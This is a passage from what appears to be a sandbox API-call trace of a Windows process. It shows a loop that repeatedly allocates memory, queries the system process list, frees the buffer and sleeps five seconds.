BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.323] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.327] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.328] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.330] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.330] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.331] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.331] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.331] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.336] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.337] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.339] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.340] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.341] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.341] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.341] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.346] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.346] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.348] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.348] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.349] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.360] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.360] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.364] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.365] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.367] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.368] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.368] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.369] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.369] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.373] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.373] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.375] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.376] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.377] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.377] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.377] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.381] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.382] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.385] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.385] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.386] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.386] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.387] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.390] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.391] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.392] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.392] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.393] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.393] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.393] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.397] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.398] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.400] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.400] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.401] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.402] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.402] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.405] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.406] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.408] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.409] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.410] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.410] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.410] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.413] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.414] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.416] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.416] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.417] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.417] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.417] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.421] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.422] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.423] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.424] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.425] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.425] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.425] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.429] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.430] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.432] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.432] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.433] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.433] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.433] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.437] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.437] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.439] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.439] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.440] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.440] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.440] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.445] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.446] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.448] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.448] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.449] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.449] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.449] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.453] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.453] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.455] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.455] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.457] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.457] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.457] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.461] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.462] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.464] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.464] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.465] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.465] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.465] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.469] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.470] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.471] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.472] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.472] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.473] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.473] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.476] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.477] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.478] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.479] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.480] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.480] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.481] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.484] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.485] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.486] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.487] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.487] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.487] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.488] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.491] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.492] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.496] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.496] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.496] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.497] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.497] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.500] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.501] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.505] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.506] NtQuerySystemInformation (in: 